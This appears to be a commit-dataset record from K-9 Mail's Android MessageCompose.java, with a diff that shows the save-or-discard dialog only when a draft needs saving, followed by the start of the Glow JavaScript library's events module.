message.setReferences(mReferences); } String text = null; if (mCrypto.getEncryptedData() != null) { text = mCrypto.getEncryptedData(); } else { text = buildText(appendSig); } TextBody body = new TextBody(text); if (mAttachments.getChildCount() > 0) { /* * The message has attachments that need to be included. First we add the part * containing the text that will be sent and then we include each attachment. */ MimeMultipart mp; mp = new MimeMultipart(); mp.addBodyPart(new MimeBodyPart(body, "text/plain")); for (int i = 0, count = mAttachments.getChildCount(); i < count; i++) { Attachment attachment = (Attachment) mAttachments.getChildAt(i).getTag(); MimeBodyPart bp = new MimeBodyPart( new LocalStore.LocalAttachmentBody(attachment.uri, getApplication())); /* * Correctly encode the filename here. Otherwise the whole * header value (all parameters at once) will be encoded by * MimeHeader.writeTo(). */ bp.addHeader(MimeHeader.HEADER_CONTENT_TYPE, String.format("%s;\n name=\"%s\"", attachment.contentType, EncoderUtil.encodeIfNecessary(attachment.name, EncoderUtil.Usage.WORD_ENTITY, 7))); bp.addHeader(MimeHeader.HEADER_CONTENT_TRANSFER_ENCODING, "base64"); /* * TODO: Oh the joys of MIME... * * From RFC 2183 (The Content-Disposition Header Field): * "Parameter values longer than 78 characters, or which * contain non-ASCII characters, MUST be encoded as specified * in [RFC 2184]." * * Example: * * Content-Type: application/x-stuff * title*1*=us-ascii'en'This%20is%20even%20more%20 * title*2*=%2A%2A%2Afun%2A%2A%2A%20 * title*3="isn't it!" */ bp.addHeader(MimeHeader.HEADER_CONTENT_DISPOSITION, String.format( "attachment;\n filename=\"%s\";\n size=%d", attachment.name, attachment.size)); mp.addBodyPart(bp); } message.setBody(mp); } else { /* * No attachments to include, just stick the text body in the message and call * it good. 
*/ message.setBody(body); } return message; } private String appendSignature(String text) { if (mIdentity.getSignatureUse()) { String signature = mSignatureView.getText().toString(); if (signature != null && !signature.contentEquals("")) { text += "\n" + signature; } } return text; } private void sendMessage() { new SendMessageTask().execute(); } private void saveMessage() { new SaveMessageTask().execute(); } private void saveIfNeeded() { if (!mDraftNeedsSaving || mPreventDraftSaving || mCrypto.hasEncryptionKeys()) { return; } mDraftNeedsSaving = false; saveMessage(); } public void onEncryptionKeySelectionDone() { if (mCrypto.hasEncryptionKeys()) { onSend(); } else { Toast.makeText(this, R.string.send_aborted, Toast.LENGTH_SHORT).show(); } } public void onEncryptDone() { if (mCrypto.getEncryptedData() != null) { onSend(); } else { Toast.makeText(this, R.string.send_aborted, Toast.LENGTH_SHORT).show(); } } private void onSend() { if (getAddresses(mToView).length == 0 && getAddresses(mCcView).length == 0 && getAddresses(mBccView).length == 0) { mToView.setError(getString(R.string.message_compose_error_no_recipients)); Toast.makeText(this, getString(R.string.message_compose_error_no_recipients), Toast.LENGTH_LONG).show(); return; } if (mEncryptCheckbox.isChecked() && !mCrypto.hasEncryptionKeys()) { // key selection before encryption String emails = ""; Address[][] addresses = new Address[][] { getAddresses(mToView), getAddresses(mCcView), getAddresses(mBccView) }; for (Address[] addressArray : addresses) { for (Address address : addressArray) { if (emails.length() != 0) { emails += ","; } emails += address.getAddress(); } } if (emails.length() != 0) { emails += ","; } emails += mIdentity.getEmail(); mPreventDraftSaving = true; if (!mCrypto.selectEncryptionKeys(MessageCompose.this, emails)) { mPreventDraftSaving = false; } return; } if (mCrypto.hasEncryptionKeys() || mCrypto.hasSignatureKey()) { if (mCrypto.getEncryptedData() == null) { String text = buildText(true); mPreventDraftSaving = true; if (!mCrypto.encrypt(this, text)) { mPreventDraftSaving = false; } return; } } sendMessage(); mDraftNeedsSaving = false; finish(); } private void onDiscard() { if (mDraftUid != null) { MessagingController.getInstance(getApplication()).deleteDraft(mAccount, mDraftUid); mDraftUid = null; } mHandler.sendEmptyMessage(MSG_DISCARDED_DRAFT); mDraftNeedsSaving = false; finish(); } private void onSave() { mDraftNeedsSaving = true; saveIfNeeded(); finish(); } private void onAddCcBcc() { mCcView.setVisibility(View.VISIBLE); mBccView.setVisibility(View.VISIBLE); } /** * Kick off a picker for whatever kind of MIME types we'll accept and let Android take over. */ private void onAddAttachment() { if (K9.isGalleryBuggy()) { if (K9.useGalleryBugWorkaround()) { Toast.makeText(MessageCompose.this, getString(R.string.message_compose_use_workaround), Toast.LENGTH_LONG).show(); } else { Toast.makeText(MessageCompose.this, getString(R.string.message_compose_buggy_gallery), Toast.LENGTH_LONG).show(); } } onAddAttachment2(K9.ACCEPTABLE_ATTACHMENT_SEND_TYPES[0]); } /** * Kick off a picker for the specified MIME type and let Android take over. 
*/ private void onAddAttachment2(final String mime_type) { if (mCrypto.isAvailable(this)) { Toast.makeText(this, R.string.attachment_encryption_unsupported, Toast.LENGTH_LONG).show(); } Intent i = new Intent(Intent.ACTION_GET_CONTENT); i.addCategory(Intent.CATEGORY_OPENABLE); i.setType(mime_type); startActivityForResult(Intent.createChooser(i, null), ACTIVITY_REQUEST_PICK_ATTACHMENT); } private void addAttachment(Uri uri) { addAttachment(uri, -1, null); } private void addAttachment(Uri uri, int size, String name) { ContentResolver contentResolver = getContentResolver(); Attachment attachment = new Attachment(); attachment.name = name; attachment.size = size; attachment.uri = uri; if (attachment.size == -1 || attachment.name == null) { Cursor metadataCursor = contentResolver.query(uri, new String[] { OpenableColumns.DISPLAY_NAME, OpenableColumns.SIZE }, null, null, null); if (metadataCursor != null) { try { if (metadataCursor.moveToFirst()) { if (attachment.name == null) { attachment.name = metadataCursor.getString(0); } if (attachment.size == -1) { attachment.size = metadataCursor.getInt(1); Log.v(K9.LOG_TAG, "size: " + attachment.size); } } } finally { metadataCursor.close(); } } } if (attachment.name == null) { attachment.name = uri.getLastPathSegment(); } String contentType = contentResolver.getType(uri); if (contentType == null) { contentType = MimeUtility.getMimeTypeByExtension(attachment.name); } attachment.contentType = contentType; if (attachment.size<=0) { String uriString = uri.toString(); if (uriString.startsWith("file://")) { Log.v(K9.LOG_TAG, uriString.substring("file://".length())); File f = new File(uriString.substring("file://".length())); attachment.size = f.length(); } else { Log.v(K9.LOG_TAG, "Not a file: " + uriString); } } else { Log.v(K9.LOG_TAG, "old attachment.size: " + attachment.size); } Log.v(K9.LOG_TAG, "new attachment.size: " + attachment.size); View view = getLayoutInflater().inflate(R.layout.message_compose_attachment, mAttachments, false); TextView nameView = (TextView)view.findViewById(R.id.attachment_name); ImageButton delete = (ImageButton)view.findViewById(R.id.attachment_delete); nameView.setText(attachment.name); delete.setOnClickListener(this); delete.setTag(view); view.setTag(attachment); mAttachments.addView(view); } @Override protected void onActivityResult(int requestCode, int resultCode, Intent data) { // if a CryptoSystem activity is returning, then mPreventDraftSaving was set to true mPreventDraftSaving = false; if (mCrypto.onActivityResult(this, requestCode, resultCode, data)) { return; } if (resultCode != RESULT_OK) return; if (data == null) { return; } switch (requestCode) { case ACTIVITY_REQUEST_PICK_ATTACHMENT: addAttachment(data.getData()); mDraftNeedsSaving = true; break; case ACTIVITY_CHOOSE_IDENTITY: onIdentityChosen(data); break; case ACTIVITY_CHOOSE_ACCOUNT: onAccountChosen(data); break; } } private void onAccountChosen(final Intent intent) { final Bundle extras = intent.getExtras(); final String uuid = extras.getString(ChooseAccount.EXTRA_ACCOUNT); final Identity identity = (Identity) extras.getSerializable(ChooseAccount.EXTRA_IDENTITY); final Account account = Preferences.getPreferences(this).getAccount(uuid); if (!mAccount.equals(account)) { if (K9.DEBUG) { Log.v(K9.LOG_TAG, "Switching account from " + mAccount + " to " + account); } // on draft edit, make sure we don't keep previous message UID if (ACTION_EDIT_DRAFT.equals(getIntent().getAction())) { mMessageReference = null; } // test whether there is something to save if 
(mDraftNeedsSaving || (mDraftUid != null)) { final String previousDraftUid = mDraftUid; final Account previousAccount = mAccount; // make current message appear as new mDraftUid = null; // actual account switch mAccount = account; if (K9.DEBUG) { Log.v(K9.LOG_TAG, "Account switch, saving new draft in new account"); } saveMessage(); if (previousDraftUid != null) { if (K9.DEBUG) { Log.v(K9.LOG_TAG, "Account switch, deleting draft from previous account: " + previousDraftUid); } MessagingController.getInstance(getApplication()).deleteDraft(previousAccount, previousDraftUid); } } else { mAccount = account; } // not sure how to handle mFolder, mSourceMessage? } switchToIdentity(identity); } private void onIdentityChosen(Intent intent) { Bundle bundle = intent.getExtras();; switchToIdentity((Identity)bundle.getSerializable(ChooseIdentity.EXTRA_IDENTITY)); } private void switchToIdentity(Identity identity) { mIdentity = identity; mIdentityChanged = true; mDraftNeedsSaving = true; updateFrom(); updateSignature(); } private void updateFrom() { if (mIdentityChanged) { mFromView.setVisibility(View.VISIBLE); } mFromView.setText(getString(R.string.message_view_from_format, mIdentity.getName(), mIdentity.getEmail())); } private void updateSignature() { if (mIdentity.getSignatureUse()) { mSignatureView.setText(mIdentity.getSignature()); mSignatureView.setVisibility(View.VISIBLE); } else { mSignatureView.setVisibility(View.GONE); } } public void onClick(View view) { switch (view.getId()) { case R.id.attachment_delete: /* * The view is the delete button, and we have previously set the tag of * the delete button to the view that owns it. We don't use parent because the * view is very complex and could change in the future. */ mAttachments.removeView((View) view.getTag()); mDraftNeedsSaving = true; break; case R.id.quoted_text_delete: mQuotedTextBar.setVisibility(View.GONE); mQuotedText.setVisibility(View.GONE); mDraftNeedsSaving = true; break; } } @Override public boolean onOptionsItemSelected(MenuItem item) { switch (item.getItemId()) { case R.id.send: mCrypto.setEncryptionKeys(null); onSend(); break; case R.id.save: onSave(); break; case R.id.discard: onDiscard(); break; case R.id.add_cc_bcc: onAddCcBcc(); break; case R.id.add_attachment: onAddAttachment(); break; case R.id.add_attachment_image: onAddAttachment2("image/*"); break; case R.id.add_attachment_video: onAddAttachment2("video/*"); break; case R.id.choose_identity: onChooseIdentity(); break; default: return super.onOptionsItemSelected(item); } return true; } private void onChooseIdentity() { // keep things simple: trigger account choice only if there are more // than 1 account if (Preferences.getPreferences(this).getAccounts().length > 1) { final Intent intent = new Intent(this, ChooseAccount.class); intent.putExtra(ChooseAccount.EXTRA_ACCOUNT, mAccount.getUuid()); intent.putExtra(ChooseAccount.EXTRA_IDENTITY, mIdentity); startActivityForResult(intent, ACTIVITY_CHOOSE_ACCOUNT); } else if (mAccount.getIdentities().size() > 1) { Intent intent = new Intent(this, ChooseIdentity.class); intent.putExtra(ChooseIdentity.EXTRA_ACCOUNT, mAccount.getUuid()); startActivityForResult(intent, ACTIVITY_CHOOSE_IDENTITY); } else { Toast.makeText(this, getString(R.string.no_identities), Toast.LENGTH_LONG).show(); } } @Override public boolean onCreateOptionsMenu(Menu menu) { super.onCreateOptionsMenu(menu); getMenuInflater().inflate(R.menu.message_compose_option, menu); /* * Show the menu items "Add attachment (Image)" and "Add attachment (Video)" * if the 
work-around for the Gallery bug is enabled (see Issue 1186). */ int found = 0; for (int i = menu.size() - 1; i >= 0; i--) { MenuItem item = menu.getItem(i); int id = item.getItemId(); if ((id == R.id.add_attachment_image) || (id == R.id.add_attachment_video)) { item.setVisible(K9.useGalleryBugWorkaround()); found++; } // We found all the menu items we were looking for. So stop here. if (found == 2) break; } return true; } public void onBackPressed() { // This will be called either automatically for you on 2.0 // or later, or by the code above on earlier versions of the // platform. showDialog(DIALOG_SAVE_OR_DISCARD_DRAFT_MESSAGE); } @Override public Dialog onCreateDialog(int id) { switch (id) { case DIALOG_SAVE_OR_DISCARD_DRAFT_MESSAGE: return new AlertDialog.Builder(this) .setTitle(R.string.save_or_discard_draft_message_dlg_title) .setMessage(R.string.save_or_discard_draft_message_instructions_fmt) .setPositiveButton(R.string.save_draft_action, new DialogInterface.OnClickListener() { public void onClick(DialogInterface dialog, int whichButton) { dismissDialog(1); onSave(); } }) .setNegativeButton(R.string.discard_action, new DialogInterface.OnClickListener() { public void onClick(DialogInterface dialog, int whichButton) { dismissDialog(1); onDiscard(); } }) .create(); } return super.onCreateDialog(id); } @Override public boolean onKeyDown(int keyCode, KeyEvent event) { if ( // TODO - when we move to android 2.0, uncomment this. // android.os.Build.VERSION.SDK_INT < android.os.Build.VERSION_CODES.ECLAIR && keyCode == KeyEvent.KEYCODE_BACK && event.getRepeatCount() == 0 && K9.manageBack()) { // Take care of calling this method on earlier versions of // the platform where it doesn't exist. onBackPressed(); return true; } return super.onKeyDown(keyCode, event); } /** * Returns true if all attachments were able to be attached, otherwise returns false. */ private boolean loadAttachments(Part part, int depth) throws MessagingException { if (part.getBody() instanceof Multipart) { Multipart mp = (Multipart) part.getBody(); boolean ret = true; for (int i = 0, count = mp.getCount(); i < count; i++) { if (!loadAttachments(mp.getBodyPart(i), depth + 1)) { ret = false; } } return ret; } else { String contentType = MimeUtility.unfoldAndDecode(part.getContentType()); String name = MimeUtility.getHeaderParameter(contentType, "name"); if (name != null) { Body body = part.getBody(); if (body != null && body instanceof LocalAttachmentBody) { final Uri uri = ((LocalAttachmentBody) body).getContentUri(); mHandler.post(new Runnable() { public void run() { addAttachment(uri); } }); } else { return false; } } return true; } } /** * Pull out the parts of the now loaded source message and apply them to the new message * depending on the type of message being composed. * @param message */ private void processSourceMessage(Message message) { String action = getIntent().getAction(); if (ACTION_REPLY.equals(action) || ACTION_REPLY_ALL.equals(action)) { try { if (message.getSubject() != null && !message.getSubject().toLowerCase().startsWith("re:")) { mSubjectView.setText("Re: " + message.getSubject()); } else { mSubjectView.setText(message.getSubject()); } /* * If a reply-to was included with the message use that, otherwise use the from * or sender address. 
*/ Address[] replyToAddresses; if (message.getReplyTo().length > 0) { addAddresses(mToView, replyToAddresses = message.getReplyTo()); } else { addAddresses(mToView, replyToAddresses = message.getFrom()); } if (message.getMessageId() != null && message.getMessageId().length() > 0) { String messageId = message.getMessageId(); mInReplyTo = messageId; if (message.getReferences() != null && message.getReferences().length > 0) { StringBuffer buffy = new StringBuffer(); for (int i=0; i < message.getReferences().length; i++) buffy.append(message.getReferences()[i]); mReferences = buffy.toString() + " " + mInReplyTo; } else { mReferences = mInReplyTo; } } else { if (K9.DEBUG) Log.d(K9.LOG_TAG, "could not get Message-ID."); } Part part = MimeUtility.findFirstPartByMimeType(mSourceMessage, "text/plain"); if (part != null || mSourceMessageBody != null) { String quotedText = String.format( getString(R.string.message_compose_reply_header_fmt), Address.toString(mSourceMessage.getFrom())); final String prefix = mAccount.getQuotePrefix(); // "$" and "\" in the quote prefix have to be escaped for // the replaceAll() invocation. final String escapedPrefix = prefix.replaceAll("(\\\\|\\$)", "\\\\$1"); if (mSourceMessageBody != null) { quotedText += mSourceMessageBody.replaceAll("(?m)^", escapedPrefix); } else { quotedText += MimeUtility.getTextFromPart(part).replaceAll( "(?m)^", escapedPrefix); } quotedText = quotedText.replaceAll("\\\r", ""); mQuotedText.setText(quotedText); mQuotedTextBar.setVisibility(View.VISIBLE); mQuotedText.setVisibility(View.VISIBLE); } if (ACTION_REPLY_ALL.equals(action) || ACTION_REPLY.equals(action)) { Identity useIdentity = null; for (Address address : message.getRecipients(RecipientType.TO)) { Identity identity = mAccount.findIdentity(address); if (identity != null) { useIdentity = identity; break; } } if (useIdentity == null) { if (message.getRecipients(RecipientType.CC).length > 0) { for (Address address : message.getRecipients(RecipientType.CC)) { Identity identity = mAccount.findIdentity(address); if (identity != null) { useIdentity = identity; break; } } } } if (useIdentity != null) { Identity defaultIdentity = mAccount.getIdentity(0); if (useIdentity != defaultIdentity) { switchToIdentity(useIdentity); } } } if (ACTION_REPLY_ALL.equals(action)) { for (Address address : message.getRecipients(RecipientType.TO)) { if (!mAccount.isAnIdentity(address)) { addAddress(mToView, address); } } if (message.getRecipients(RecipientType.CC).length > 0) { for (Address address : message.getRecipients(RecipientType.CC)) { if (!mAccount.isAnIdentity(address) && !Utility.arrayContains(replyToAddresses, address)) { addAddress(mCcView, address); } } mCcView.setVisibility(View.VISIBLE); } } } catch (MessagingException me) { /* * This really should not happen at this point but if it does it's okay. * The user can continue composing their message. 
*/ } } else if (ACTION_FORWARD.equals(action)) { try { if (message.getSubject() != null && !message.getSubject().toLowerCase().startsWith("fwd:")) { mSubjectView.setText("Fwd: " + message.getSubject()); } else { mSubjectView.setText(message.getSubject()); } Part part = MimeUtility.findFirstPartByMimeType(message, "text/plain"); if (part == null) { part = MimeUtility.findFirstPartByMimeType(message, "text/html"); } if (part != null || mSourceMessageBody != null) { String quotedText = mSourceMessageBody; if (quotedText == null) { quotedText = MimeUtility.getTextFromPart(part); } if (quotedText != null) { String text = String.format( getString(R.string.message_compose_fwd_header_fmt), mSourceMessage.getSubject(), Address.toString(mSourceMessage.getFrom()), Address.toString( mSourceMessage.getRecipients(RecipientType.TO)), Address.toString( mSourceMessage.getRecipients(RecipientType.CC))); quotedText = quotedText.replaceAll("\\\r", ""); text += quotedText; mQuotedText.setText(text); mQuotedTextBar.setVisibility(View.VISIBLE); mQuotedText.setVisibility(View.VISIBLE); } } if (!mSourceMessageProcessed) { if (!loadAttachments(message, 0)) { mHandler.sendEmptyMessage(MSG_SKIPPED_ATTACHMENTS); } } } catch (MessagingException me) { /* * This really should not happen at this point but if it does it's okay. * The user can continue composing their message. */ } } else if (ACTION_EDIT_DRAFT.equals(action)) { try { mDraftUid = message.getUid(); mSubjectView.setText(message.getSubject()); addAddresses(mToView, message.getRecipients(RecipientType.TO)); if (message.getRecipients(RecipientType.CC).length > 0) { addAddresses(mCcView, message.getRecipients(RecipientType.CC)); mCcView.setVisibility(View.VISIBLE); } if (message.getRecipients(RecipientType.BCC).length > 0) { addAddresses(mBccView, message.getRecipients(RecipientType.BCC)); mBccView.setVisibility(View.VISIBLE); } // Read In-Reply-To header from draft final String[] inReplyTo = message.getHeader("In-Reply-To"); if ((inReplyTo != null) && (inReplyTo.length >= 1)) { mInReplyTo = inReplyTo[0]; } // Read References header from draft final String[] references = message.getHeader("References"); if ((references != null) && (references.length >= 1)) { mReferences = references[0]; } if (!mSourceMessageProcessed) { loadAttachments(message, 0); } Integer bodyLength = null; String[] k9identities = message.getHeader(K9.K9MAIL_IDENTITY); if (k9identities != null && k9identities.length > 0) { String k9identity = k9identities[0]; if (k9identity != null) { if (K9.DEBUG) Log.d(K9.LOG_TAG, "Got a saved identity: " + k9identity); StringTokenizer tokens = new StringTokenizer(k9identity, ":", false); String bodyLengthS = null; String name = null; String email = null; String signature = null; boolean signatureUse = message.getFolder().getAccount().getSignatureUse(); if (tokens.hasMoreTokens()) { bodyLengthS = Utility.base64Decode(tokens.nextToken()); try { bodyLength = Integer.parseInt(bodyLengthS); } catch (Exception e) { Log.e(K9.LOG_TAG, "Unable to parse bodyLength '" + bodyLengthS + "'"); } } if (tokens.hasMoreTokens()) { signatureUse = true; signature = Utility.base64Decode(tokens.nextToken()); } if (tokens.hasMoreTokens()) { name = Utility.base64Decode(tokens.nextToken()); } if (tokens.hasMoreTokens()) { email = Utility.base64Decode(tokens.nextToken()); } Identity newIdentity = new Identity(); newIdentity.setSignatureUse(signatureUse); if (signature != null) { newIdentity.setSignature(signature); mSignatureChanged = true; } else { 
newIdentity.setSignature(mIdentity.getSignature()); } if (name != null) { newIdentity.setName(name); mIdentityChanged = true; } else { newIdentity.setName(mIdentity.getName()); } if (email != null) { newIdentity.setEmail(email); mIdentityChanged = true; } else { newIdentity.setEmail(mIdentity.getEmail()); } mIdentity = newIdentity; updateSignature(); updateFrom(); } } Part part = MimeUtility.findFirstPartByMimeType(message, "text/plain"); if (part != null) { String text = MimeUtility.getTextFromPart(part); if (bodyLength != null && bodyLength + 1 < text.length()) // + 1 to get rid of the newline we added when saving the draft { String bodyText = text.substring(0, bodyLength); String quotedText = text.substring(bodyLength + 1, text.length()); mMessageContentView.setText(bodyText); mQuotedText.setText(quotedText); mQuotedTextBar.setVisibility(View.VISIBLE); mQuotedText.setVisibility(View.VISIBLE); } else { mMessageContentView.setText(text); } } } catch (MessagingException me) { // TODO } } mSourceMessageProcessed = true; mDraftNeedsSaving = false; } class Listener extends MessagingListener { @Override public void loadMessageForViewStarted(Account account, String folder, String uid) { if ((mMessageReference == null) || !mMessageReference.uid.equals(uid)) { return; } mHandler.sendEmptyMessage(MSG_PROGRESS_ON); } @Override public void loadMessageForViewFinished(Account account, String folder, String uid, Message message) { if ((mMessageReference == null) || !mMessageReference.uid.equals(uid)) { return; } mHandler.sendEmptyMessage(MSG_PROGRESS_OFF); } @Override public void loadMessageForViewBodyAvailable(Account account, String folder, String uid, final Message message) { if ((mMessageReference == null) || !mMessageReference.uid.equals(uid)) { return; } mSourceMessage = message; runOnUiThread(new Runnable() { public void run() { processSourceMessage(message); } }); } @Override public void loadMessageForViewFailed(Account account, String folder, String uid, Throwable t) { if ((mMessageReference == null) || !mMessageReference.uid.equals(uid)) { return; } mHandler.sendEmptyMessage(MSG_PROGRESS_OFF); // TODO show network error } @Override public void messageUidChanged(Account account, String folder, String oldUid, String newUid) { //TODO: is this really necessary here? mDraftUid is update after the call to MessagingController.saveDraft() // Track UID changes of the draft message if (account.equals(mAccount) && folder.equals(mAccount.getDraftsFolderName()) && oldUid.equals(mDraftUid)) { mDraftUid = newUid; } // Track UID changes of the source message if (mMessageReference != null) { final Account sourceAccount = Preferences.getPreferences(MessageCompose.this).getAccount(mMessageReference.accountUuid); final String sourceFolder = mMessageReference.folderName; final String sourceMessageUid = mMessageReference.uid; if (account.equals(sourceAccount) && (folder.equals(sourceFolder))) { if (oldUid.equals(sourceMessageUid)) { mMessageReference.uid = newUid; } if ((mSourceMessage != null) && (oldUid.equals(mSourceMessage.getUid()))) { mSourceMessage.setUid(newUid); } } } } } private String decode(String s) throws UnsupportedEncodingException { return URLDecoder.decode(s, "UTF-8"); } /** * When we are launched with an intent that includes a mailto: URI, we can actually * gather quite a few of our message fields from it. * * @mailToString the href (which must start with "mailto:"). */ private void initializeFromMailTo(String mailToString) { // Chop up everything between mailto: and ? 
to find recipients int index = mailToString.indexOf("?"); int length = "mailto".length() + 1; String to; try { // Extract the recipient after mailto: if (index == -1) { to = decode(mailToString.substring(length)); } else { to = decode(mailToString.substring(length, index)); } mToView.setText(to); } catch (UnsupportedEncodingException e) { Log.e(K9.LOG_TAG, e.getMessage() + " while decoding '" + mailToString + "'"); } // Extract the other parameters // We need to disguise this string as a URI in order to parse it Uri uri = Uri.parse("foo://" + mailToString); String addressList; addressList = ""; List<String> cc = uri.getQueryParameters("cc"); for (String address : cc) { addressList += address + ","; } mCcView.setText(addressList); addressList = ""; List<String> bcc = uri.getQueryParameters("bcc"); for (String address : bcc) { addressList += address + ","; } mBccView.setText(addressList); List<String> subject = uri.getQueryParameters("subject"); if (subject.size() > 0) { mSubjectView.setText(subject.get(0)); } List<String> body = uri.getQueryParameters("body"); if (body.size() > 0) { mMessageContentView.setText(body.get(0)); } } private class SendMessageTask extends AsyncTask<Void, Void, Void> { protected Void doInBackground(Void... params) { /* * Create the message from all the data the user has entered. */ MimeMessage message; try { message = createMessage(true); // Only append sig on save } catch (MessagingException me) { Log.e(K9.LOG_TAG, "Failed to create new message for send or save.", me); throw new RuntimeException("Failed to create a new message for send or save.", me); } MessagingController.getInstance(getApplication()).sendMessage(mAccount, message, null); if (mDraftUid != null) { MessagingController.getInstance(getApplication()).deleteDraft(mAccount, mDraftUid); mDraftUid = null; } return null; } } private class SaveMessageTask extends AsyncTask<Void, Void, Void> { protected Void doInBackground(Void... params) { /* * Create the message from all the data the user has entered. */ MimeMessage message; try { message = createMessage(false); // Only append sig on save } catch (MessagingException me) { Log.e(K9.LOG_TAG, "Failed to create new message for send or save.", me); throw new RuntimeException("Failed to create a new message for send or save.", me); } /* * Save a draft */ if (mDraftUid != null) { message.setUid(mDraftUid); } else if (ACTION_EDIT_DRAFT.equals(getIntent().getAction())) { /* * We're saving a previously saved draft, so update the new message's uid * to the old message's uid. */ message.setUid(mMessageReference.uid); } String k9identity = Utility.base64Encode("" + mMessageContentView.getText().toString().length()); if (mIdentityChanged || mSignatureChanged) { String signature = mSignatureView.getText().toString(); k9identity += ":" + Utility.base64Encode(signature); if (mIdentityChanged) { String name = mIdentity.getName(); String email = mIdentity.getEmail(); k9identity += ":" + Utility.base64Encode(name) + ":" + Utility.base64Encode(email); } } if (K9.DEBUG) Log.d(K9.LOG_TAG, "Saving identity: " + k9identity); message.addHeader(K9.K9MAIL_IDENTITY, k9identity); Message draftMessage = MessagingController.getInstance(getApplication()).saveDraft(mAccount, message); mDraftUid = draftMessage.getUid(); // Don't display the toast if the user is just changing the orientation if ((getChangingConfigurations() & ActivityInfo.CONFIG_ORIENTATION) == 0) { mHandler.sendEmptyMessage(MSG_SAVED_DRAFT); } return null; } } }
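The SaveMessageTask above serialises the active identity into the custom K9.K9MAIL_IDENTITY header as colon-separated base64 tokens (body length, then optionally signature, then name and email), and the ACTION_EDIT_DRAFT branch of processSourceMessage() reverses that with a StringTokenizer, using the decoded body length to split the stored text back into body and quoted text. A minimal standalone sketch of that round trip follows; it is illustrative only, uses java.util.Base64 in place of K-9's Utility.base64Encode/base64Decode helpers, and the class and variable names are not from the source.

// Hypothetical sketch of the K9MAIL_IDENTITY header round trip (not K-9 code).
import java.util.Base64;
import java.util.StringTokenizer;

public class IdentityHeaderSketch
{
    // Stand-ins for K-9's Utility.base64Encode / base64Decode (assumption).
    static String enc(String s) { return Base64.getEncoder().encodeToString(s.getBytes()); }
    static String dec(String s) { return new String(Base64.getDecoder().decode(s)); }

    public static void main(String[] args)
    {
        String body = "Hello world";        // message text the user typed
        String signature = "-- \nJo";       // written only when identity/signature changed
        String name = "Jo Bloggs";
        String email = "[email protected]";

        // Encode side (as in SaveMessageTask): bodyLength[:signature[:name:email]]
        // Base64 output never contains ':', so a colon is a safe delimiter.
        String k9identity = enc(String.valueOf(body.length()))
                            + ":" + enc(signature)
                            + ":" + enc(name)
                            + ":" + enc(email);

        // Decode side (as in the ACTION_EDIT_DRAFT branch): same order, colon-tokenised.
        StringTokenizer tokens = new StringTokenizer(k9identity, ":", false);
        int bodyLength = Integer.parseInt(dec(tokens.nextToken()));
        String sig = dec(tokens.nextToken());
        String savedName = dec(tokens.nextToken());
        String savedEmail = dec(tokens.nextToken());
        System.out.println(bodyLength + " / " + sig + " / " + savedName + " / " + savedEmail);
    }
}

The body length is stored first so that, when the draft is reloaded, the single text/plain part can be cut at that offset to separate the editable body from the quoted text that follows it.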
Only show "save or discard" dialog before leaving the message compose activity if the message needs saving.
src/com/fsck/k9/activity/MessageCompose.java
Only show "save or discard" dialog before leaving the message compose activity if the message needs saving.
<ide><path>src/com/fsck/k9/activity/MessageCompose.java
<ide> import android.view.View.OnFocusChangeListener;
<ide> import android.view.Window;
<ide> import android.widget.AutoCompleteTextView.Validator;
<del>import android.widget.Button;
<ide> import android.widget.CheckBox;
<ide> import android.widget.EditText;
<ide> import android.widget.ImageButton;
<ide> return true;
<ide> }
<ide>
<add> @Override
<ide> public void onBackPressed()
<ide> {
<ide> // This will be called either automatically for you on 2.0
<ide> // or later, or by the code above on earlier versions of the
<ide> // platform.
<del> showDialog(DIALOG_SAVE_OR_DISCARD_DRAFT_MESSAGE);
<add> if (mDraftNeedsSaving)
<add> {
<add> showDialog(DIALOG_SAVE_OR_DISCARD_DRAFT_MESSAGE);
<add> }
<add> else
<add> {
<add> finish();
<add> }
<ide> }
<ide>
<ide> @Override
<ide>
<ide> private class SendMessageTask extends AsyncTask<Void, Void, Void>
<ide> {
<add> @Override
<ide> protected Void doInBackground(Void... params)
<ide> {
<ide> /*
<ide>
<ide> private class SaveMessageTask extends AsyncTask<Void, Void, Void>
<ide> {
<add> @Override
<ide> protected Void doInBackground(Void... params)
<ide> {
<ide>
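Reassembled from the diff hunks above (assuming the unchanged context lines), the back-button handler after the patch reads roughly as follows; the dialog is only raised when there are unsaved edits, otherwise the activity simply finishes.

@Override
public void onBackPressed()
{
    // This will be called either automatically for you on 2.0
    // or later, or by the code above on earlier versions of the
    // platform.
    if (mDraftNeedsSaving)
    {
        showDialog(DIALOG_SAVE_OR_DISCARD_DRAFT_MESSAGE);
    }
    else
    {
        finish();
    }
}

Since the TextWatchers registered in onCreate() set mDraftNeedsSaving to true on any edit, an untouched compose screen can now be dismissed without triggering the save-or-discard prompt.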
JavaScript
apache-2.0
f5b2e25588ae99e24af8b5ae398a1ea02ba1160c
0
glow/glow2,glow/glow2
/** @name glow.events @namespace @description Native browser and custom events */ //----------------------------------------------------------------- Glow.provide({ version: '@SRC@', builder: function(glow) { glow.events = glow.events || {}; /* storage variables */ var r = {}; var eventListeners = {}; var eventid = 1; var objid = 1; var psuedoPrivateEventKey = '__eventId' + glow.UID; var psuedoPreventDefaultKey = psuedoPrivateEventKey + 'PreventDefault'; var psuedoStopPropagationKey = psuedoPrivateEventKey + 'StopPropagation'; /** @name glow.events.addListeners @function @param {Object[]} attachTo Array of objects to add listeners to @param {String} name Name of the event to listen for @param {Function} callback Function to call when the event fires. The callback is passed a single event object. The type of this object depends on the event (see documentation for the event you're listening to). @param {Object} [thisVal] Value of 'this' within the callback. By default, this is the object being listened to. @description Convenience method to add listeners to many objects at once. If you're wanting to add a listener to a single object, use its 'on' method. */ glow.events.addListeners = function (attachTo, name, callback, thisVal) { var listenerIds = [], i = attachTo.length, objIdent, listener, eventsOnObject, currentListeners; //attach the event for each element, return an array of listener ids while (i--) { objIdent = attachTo[i][psuedoPrivateEventKey]; if (!objIdent){ objIdent = attachTo[i][psuedoPrivateEventKey] = objid++; } listener = [ callback, thisVal || attachTo[i] ]; eventsOnObject = eventListeners[objIdent]; if(!eventsOnObject){ eventsOnObject = eventListeners[objIdent] = {}; } currentListeners = eventsOnObject[name]; if(!currentListeners){ currentListeners = eventsOnObject[name] = [listener]; } else{ currentListeners[currentListeners.length] = listener; } } }; /** @name glow.events.fire @function @param {Object[]} items Array of objects to add listeners to @param {String} eventName Name of the event to fire @param {glow.events.Event|Object} [event] Event object to pass into listeners. You can provide a simple object of key / value pairs which will be added as properties of a glow.events.Event instance. @description Convenience method to fire events on multiple items at once. If you're wanting to fire events on a single object, use its 'fire' method. */ glow.events.fire = function (items, eventName, event) { if 